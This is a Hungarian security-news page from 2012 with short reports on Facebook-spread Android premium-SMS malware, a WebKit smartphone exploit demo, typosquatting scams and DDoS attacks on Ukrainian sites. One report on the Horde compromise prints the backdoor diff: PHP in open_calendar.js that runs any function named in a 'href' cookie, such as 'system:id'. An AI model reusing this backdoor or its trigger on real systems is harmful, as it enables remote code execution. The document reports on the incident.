Elhajlási engedély

Készült: 2012. március 02
Nyomtatás

Újabb fejezethez érkezett a Facebookon közlekedő kártékony kódok története. Mostantól például egy meghívóban szereplő profil linkjére kattintva egy Androidos okostelefonon az akár automatikusan letölthet egy emelt díjas SMS és telefonhívásokkal operáló csaló alkalmazást a készülékünkre.

A Sophos kutatói készítettek egy kis bemutató minivideót erről az esetről, amiben egy ismerősnek jelöléssel kapcsolatos profilban szereplő URL titokban átirányította a böngészőt. Igaz, itt a Facebook profil tulajdonképpen csak közvetítő hordozó közeg volt, de ami a lényeg, hogy teljesen automatikusan letöltődött egy Android alkalmazás a készülékre.

Erről pedig kiderült, hogy olyan emelt díjas hívásokkal és szöveges üzenetekkel manipuláló program, amely egy titkosított konfigurációs fájl segítségével próbál meg költséges, a tulajdonos számláját megcsapoló hívásokat indítani. Mindenesetre egy átlagfelhasználót beleképzelve a fenti szituációba, igen életszerű, hogy neki a vírusvédelmi szakemberrel ellentétben nem szólal meg a fejében az a bizonyos vészcsengő, és fel is telepíti azt, az alkalmazás pedig onnantól már teszi nála a dolgát.

A trükköt látva az ember nem is azon csodálkozik elsősorban, hogy ezt így könnyedén meg lehet csinálni, hanem inkább azon, hogy nem korábban állt elő már valaki tömegesen ezzel. Ha most arra kellene valami okosat mondani, mivel lehet hatékonyan védekezni, arra azonnal két ütőképes ötlet is felmerül a szinte evidens "ne kattintsunk mindenre ész nélkül" intelem mellett. Az első persze mi más is lehetne, mint egy kártékony linkeket és  applikációkat is ellenőrző antivírus program használata az Androidon, ami ezen a nyitott és bárki által fejleszthető alkalmazások általi platformon egyre inkább az alapfelszereltség kategóriába tartozik.

A másik egy apró, de igen ötletes app, amely a telefonhívásokat képes megzabolázni, illetve kontroll alatt tartani. Az ingyenes Call confirm minden egyes indított hívás előtt rákérdez egy ablakban, hogy biztosan ezt akarjuk-e, és csak az igenlő jóváhagyás után tárcsázza azt. Ezzel nem mellesleg azt is sikeresen megakadályozhatjuk, hogy a telefonkönyv rendezgetése közben mondjunk egy éjszakai órában véletlenül felhívjunk valakit.

Többször is említettük már, hogy a mobilos netezés rejteget különféle veszélyforrásokat a hagyományos PC-s internetes böngészéshez képest, és ebben a szerényebb képességű böngészőkliensek éppúgy szerepet játszanak, mint az apró kijelzős helyspórolás miatti automatikus URL link rejtés. Az Androidosok emellett ugyancsak szeretik elhanyagolni, figyelmen kívül hagyni a telepítéskori (no meg a frissítésnél szintén) az engedélyek ellenőrzését, végiggondolását. Nem mérlegelik, ha egy fatengelyes pasziánsz ahhoz kér engedélyt, hogy írja-olvassa telefonkönyvünket, emellett ellenőrizni akarja a teljes netes forgalmunkat, vagy éppen önállóan szeretne hívásokat kezdeményezni - akkor ilyen indokolatlan felhatalmazásokkal rendelkező applikációt épeszű ember nem telepít fel, inkább másik alternatívát keres.

Ezek a kritikus mérlegelések ugyanúgy igazak az Androidos Facebook alkalmazásra is, amelynek nem mellesleg a felhasználói szerződésében szerepel, hogy az app küldhet, fogadhat és feldolgozhat SMS-üzeneteket. Az Index cikke emellett megemlíti, hogy a felmérések szerint a felhasználók 70 százaléka olvasatlanul okézza le az engedélyezéssekkel kapcsolatos szövegeket telepítéskor - és ez sajnos nagyon is realistán hangzik.

Ám a mai poszt fényében mindezen veszélyforrások mellé elkönyvelhetjük azt is, hogy egy meggondolatlan kattintás után nem okvetlenül csak valamilyen Windows sebezhetőséget kihasználó .EXE vagy kártékony .PDF érkezhet, hanem mostantól mobilos Facebookozás közben már akár trükkös, emelt díjas applikációt jelentő .APK is csatlakozhat ehhez a díszes kompániához.

forrás: Antivírus Blog - http://antivirus.blog.hu/

 

Webkittel az okostelefonok ellen

Készült: 2012. március 02
Nyomtatás

Ha minden igaz, az RSA 2012 konferencián egy olyan új, súlyos sebezhetőséget fognak demonstrálni, amellyel mind az Android, Blackberry és IOS készülékek felett távolról át lehet venni az uralmat.

És mivel a mobil OS frissítések - ha vannak egyáltalán - közel sem olyan tempójúak és egyszerűek, mint mondjuk egy asztali PC esetében, ezért ez a sérülékenység sajnos sokáig - akár a következő készülékcseréig - megmaradhat. A CrowdStrike egy újonnan alapított biztonsági cég, melynek vezetője korábban a McAfee munkatársa volt. Ők fogják bemutatni jövő héten San Franciscóban azt a WebKit alapú támadást, melynek eredményeként a támadók képesek lehetnek megszerezni az irányítást az áldozat okostelefon-készüléke felett.

A támadás úgy működik, hogy kapunk egy e-mailt vagy egy SMS üzenetet, melyben egy kártékony link található, a PEBKAC kattintásról pedig valamilyen jól bevált social engineering trükk fog gondoskodni - tudd meg az irokéz/apacs/sziú/dakota neved, ingyen iPhone, ingyen iPad, ingyen meztelen nők, ingyen Victoria's Secret 1000 dollár, ingyen bármi. A kattintással aztán megfertőződik a készülék, ami a már említett távoli kontroll átvételét jelenti: a támadó lehallgathatja a hívásokat, figyelemmel kísérheti a készülék GPS helyzetét, szóval csupa hasonló nem kívánatos következmény sújthatja porba korábbi jó hangulatunkat.

Mivel a WebKit nem csak Android, hanem Google Chrome, Research in Motion’s BlackBerry, Apple Safari web böngésző valamint Apple iOS rendszer alatt is használatos, ezért nem csupán a zöld robotos készülékek tulajdonosai aggódhatnak, hanem ha minden igaz, és a demonstráció sikeres lesz, szinte minden okostelefon platform veszélyeztetett lesz. Mint ismeretes, 2009-ben Charlie Miller és Collin Mulliner már képesek voltak egy preparált SMS üzenet segítségével támadni az Apple iPhone-t a BlackHat konferencián, ahol ugyancsak sikeresen át tudták venni távolról az uralmat a készülék felett. A módszert adatlopásra, hívások és üzenetek ellenőrzésére lehetett kihasználni, az Apple pedig később ennek nyomán elkészítette az ismertetett sebezhetőség javítását.

Bár a most közelgő bemutató eredetileg a 2.2 Android rendszer alá készült, elviekben semmi nem akadályozza meg azt, hogy a későbbiekben a 2.3 vagy későbbi verziókhoz is elkészülhessen. Mivel az Android esetében sokan használnak még 2.2-est, és az ő esetükben a szerényebb készülékparaméterek miatt esetleg nem is végezhető el a verziófrissítés, sokan védtelenek maradhatnak. Az IOS esetében létezik ugyan rendszeres frissítési mechanizmus, ám ott is például a régebbi 3G, 3GS készülékek tulajdonosai üzleti megfontolások miatt már eleve ki vannak zárva a javítások, updatek trükközések nélküli letöltési lehetőségéből.

Magyarán ha beigazolódik az elv, sikeres lesz a demó, amelyet mi is kíváncsian várunk, akkor a védekezésnél egyfelől a világhírű "nem kattintunk ész nélkül mindenre" módszer, valamint egy naprakész mobilplatformos vírusvédelmi alkalmazás futtattatása lehet hasznos számunkra. Azt mindenesetre mindenkinek tudomásul kell vennie, hogy a mobil eszközök egyre inkább sebezhetőekké válnak, és az okostelefon használóknak sem árt tisztában lenniük azzal, hogy milyen fajta támadási módszereket vethetnek be ellenük.

forrás: Antivírus Blog - http://antivirus.blog.hu/

 

Lefotózunk, felcímkézünk, kiteszünk

Készült: 2012. február 21
Nyomtatás

arcos_feltrsJa hogy te esetleg nem akartad publikusan viszontlátni magad vagy a családod a Facebookon fotón, esetleg videón?

Bővebben: Lefotózunk, felcímkézünk, kiteszünk
 

A játék nyertese nem más, mint Te. Vagy mégsem?

Készült: 2012. február 21
Nyomtatás

googlakatkaMég egyszer a typosquattingról, és nyilván nem utoljára. Az apropót pedig mindehhez az adja, hogy a napokban végre bezártak két, a Wikipédia és a Twitter nevével visszaélő weboldalt, és üzemeltetőiket példás pénzbüntetéssel sújtották, akik különféle Apple termékek állítólagos nyereményjátékaival apasztották le igen hatékonyan a felhasználók pénztárcáját.

Bővebben: A játék nyertese nem más, mint Te. Vagy mégsem?
 

Hátsó kaput építettek a Horde-ba

Készült: 2012. február 21
Nyomtatás

kalozkaA Horde csoportmunka szoftver fejlesztői híreiben tegnap közölték, hogy támadás érte a horde.org tárolóit, és távoli kódfuttatásra alkalmas hátsó kaput helyeztek el a szoftverben. Az incidens a 3.3-as és 1.2-es verziókat érintette egészen tavaly november 15-től kezdődően. A legfrissebb, 4-es verzióhoz a támadók nem nyúltak. 

Eric Romang rövid összefoglalót közölt a hátsó kapuról. Eszerint a rosszindulatú kódrészletet a templates/javascript/open_calendar.js szkriptbe rejtették:

diff -u open_calendar.js.orig open_calendar.js.backdoor 
--- open_calendar.js.orig 2012-02-14 22:50:33.143182985 +0100
+++ open_calendar.js.backdoor 2012-02-14 22:49:59.143183225 +0100
@@ -274,7 +274,7 @@
cell = document.createElement('TD');
cell.className = 'rightAlign';
link = document.createElement('A');
- link.href = '#';
+ link.href = '#<?php (isset($_COOKIE["href"]) && preg_match("/(.*):(.*)/", $_COOKIE["href"], $m))?$m[1]($m[2]):"";?>';
link.innerHTML = '&raquo;';
link.onclick = function()
{

Amennyiben tehát egy látogatónál be van állítva egy href nevű süti, melyben egy "függvénynév:paraméter" formátumú sztring található, a fügvény az adott paraméterekkel lefut (pl. "system:id"). A megpatkolt szkript a segítség nyitóoldalán (/services/help/index.php), a jelszóemlékeztető és -változtató felületeken (/services/(change|reset)password.php), valamint az install szkriptben (/admin/setup/index.php) töltődik be

Forrás: Buhera Blog - http://buhera.blog.hu

 

Facebookra küldik a magyar rendőrséget

Készült: 2012. február 05
Nyomtatás

Szabó Máté alapjogi ombudsman szerint a magyar rendőrség még nincs felkészülve a 21. század infokommunikációs kihívásaira, pedig a rendőrségnek a közösségi portálokon is meg kell jelennie.

Bővebben: Facebookra küldik a magyar rendőrséget
 

Ukrán kormányzati szervek weblapjait támadták meg

Készült: 2012. február 03
Nyomtatás
Internetes támadás bénította meg csütörtökön több ukrán hivatalos szerv honlapját, miután a belügyminisztérium utasítására átmenetileg bezárták a kalóztartalmakat is megosztó ex.ua fájlcserélő portált.
A belügyminisztérium honlapját még kedden támadás érte. Azóta viszont egyebek között az elnöki hivatal, a kormány és a parlament weboldala is elérhetetlenné vált, úgyhogy az ukrán elnöki hivatal szóvivője, Darina Csepak szerdán már arra kérte az ukránokat, hogy "találják meg a tiltakozásnak egy más módját".
A belügyi tárca csütörtökön közölte, hogy az ex.ua tovább működhet majd, de a bűnügyi vizsgálatot lefolytatják ellene a szerzői jogokat sértő, kalóztartalmak terjesztéséért.
Az Ukrainska Pravda című befolyásos internetes újság arról számolt be, hogy névtelen levelet kapott, amelynek aláírója a támadás egyik szervezőjének mondta magát. Az illető szerint megkeresések tömegével bombázták a szóban forgó oldalakat, túlterhelve és megbénítva azokat.
Az azonosítatlan hacker megerősítette, hogy támadásuk válasz volt az ex.ua bezárására, mostantól azonban – mint írta – politikai irányba fordítják akcióikat, hogy "megmutassák a társadalomnak, a hatalom nem is olyan félelmetes és megdönthető".
Állítása szerint az e heti kibertámadásokban mintegy félezer profi informatikus és 100-300 ezer "egyszerű internetező" vett részt. Azt is mondta, hogy hadjáratuk folytatása érdekében felvették a kapcsolatot az úgynevezett Anonymus hackercsoporttal.
Ez utóbbi csoport vállalta a felelősséget legutóbb az amerikai és francia hivatalos internetoldalak elleni támadássorozatért, amellyel a Megaupload.com hongkongi bejegyzésű fájlcserélő oldal január végi bezárását torolták meg. Tagjai támadták meg január végén a cseh, majd a szlovák kormány weboldalait is, ezzel tiltakozva az ellen, hogy Pozsony és Prága is aláírta az online-kalózkodás, a szoftverhamisítás és a szerzői jogok megsértése ellen fellépő Hamisítás Elleni Kereskedelmi Megállapodást (ACTA).
Korábban Ben Ali tunéziai és Mubarak egyiptomi elnök, valamint Kadhafi líbiai vezető kormányzata ellen is hajtott végre internetes támadásokat az Anonymus csoport, amely a szabadság védelmezőjeként tünteti föl magát.
adatvdelemInternetes támadás bénította meg csütörtökön több ukrán hivatalos szerv honlapját, miután a belügyminisztérium utasítására átmenetileg bezárták a kalóztartalmakat is megosztó ex.ua fájlcserélő portált.
Bővebben: Ukrán kormányzati szervek weblapjait támadták meg
 

Több millió online pókerező személyes adatai kerültek ki az internetre

Készült: 2011. december 09
Nyomtatás
pokerjhdkfhiuirhfhjhfFeltehetően nem klasszikus hackelésről, hanem egyéb adattolvajlásról van szó.
Bővebben: Több millió online pókerező személyes adatai kerültek ki az internetre
 

Hackertámadás az orosz parlamenti választásoknál

Készült: 2011. december 05
Nyomtatás
oroszdjkrjeurhdjdnHackertámadás érte és ezért nem lehetett elérni a független Echo Moszkvi Rádió és több más orosz internetes kiadvány, illetve szervezet honlapját vasárnap, az oroszországi parlamenti választások napján.
Bővebben: Hackertámadás az orosz parlamenti választásoknál
 

Bűnösnek vallotta magát az Amerikában letartóztatott magyar hacker

Készült: 2011. november 28
Nyomtatás
hunhackerueiueiurueiA titkosszolgálat által januárban tőrbe csalt gyanúsított a Marriott szállodalánctól akart állást kizsarolni.
Bővebben: Bűnösnek vallotta magát az Amerikában letartóztatott magyar hacker
 

Az Alkonyat-filmekre való rákeresés egyenes út lehet a “Halál csókjához”

Készült: 2011. november 20
Nyomtatás
twilightdjhsjdiioioioirirkfkjA nagysikerű Twilight (Alkonyat) filmsorozat legújabb része biztos kasszasikert jelent, a lelkes Alkonyat-rajongók mindenütt lesben állnak, hogy újabb és újabb részleteket tudjanak meg az interneten az Alkonyat - Hajnalhasadás első részéből. A kiberbűnözők pedig tisztában vannak azzal, hogy a kíváncsiság könnyen felülkerekedhet az óvatosságon, ha a természetfeletti filmsorozatról van szó.
Bővebben: Az Alkonyat-filmekre való rákeresés egyenes út lehet a “Halál csókjához”
 

Újabb céges és államtitkok víruskézen

Készült: 2011. november 20
Nyomtatás
trojaidfhdjfhdjhdjhdjjjjjjA trójai adatlopó vírusok legújabb áldozata Norvégia: célzott támadásokkal ugyanis olaj, gáz és védelmi titkok garmadáját lopták ki helyi cégektől.
Bővebben: Újabb céges és államtitkok víruskézen
 

1. oldal / 18

<< Első < Előző 1 2 3 4 5 6 7 8 9 10 Következő > Utolsó >>

Hozzászólások

Hacktivity 2014

Események

Nincs esemény létrehozva még.

mySec talk #7 (ITBN)

A frissítés nélkül hagyott szoftverek magas aránya még mindig aggodalomra ad okot

A Secunia biztonsági cég jelentése azt mutatja, hogy az Egyesült Államokban rengeteg frissítés nélküli szoftver

Új titkosítási szabvány kerül bevezetésre az Apple-nél és a Google-nél

Az Apple azon bejelentésének nyomán, miszerint egy olyan fejlesztést eszközölnek az iOS8 operációs rendszerükön,

Önmegsemmisítő Facebook- és Twitter-üzeneteket és fotókat kínál a Dstrux

Egy cég, amely az üzleti dokumentumok biztonságba helyezésével foglalkozik, egy „Mission: Impossible” jellegű ö

Az FBI igazgatója szerint az Anonymous veszélyesebb, mint az al-Kaida

Múlt héten rendezték meg San Franciscóban az RSA biztonsági konferenciát, ahol az FBI jelenlegi igazgatója, Robert Mueller

CEO vs. CISO, avagy a biztonság két szemüvegen keresztül

A vállalatok igazgatói továbbra is nagyon eltérően tekintenek a kockázatokra és a védelmi teendőkre, mint a biztonsági v

Alig egy hét múlva Hacktivity

Október 21–22-én, immáron 13. alkalommal gyűlnek össze az etikus

Az Index.hu újságírója lett az „Év információbiztonsági újságírója”

A Hétpecsét Információbiztonsági Egyesület 2006-ban alap&iac

Boldog Új Évet Kívánunk! - 2016.

Az Antivirus.blog nevében Minden Kedves Olvasónknak Egészségben, siker

Ez történt 2015-ben

Nem volt eseménytelen esztendő a 2015. - sem. A legizgalmasabb incidense

Cron Job Starts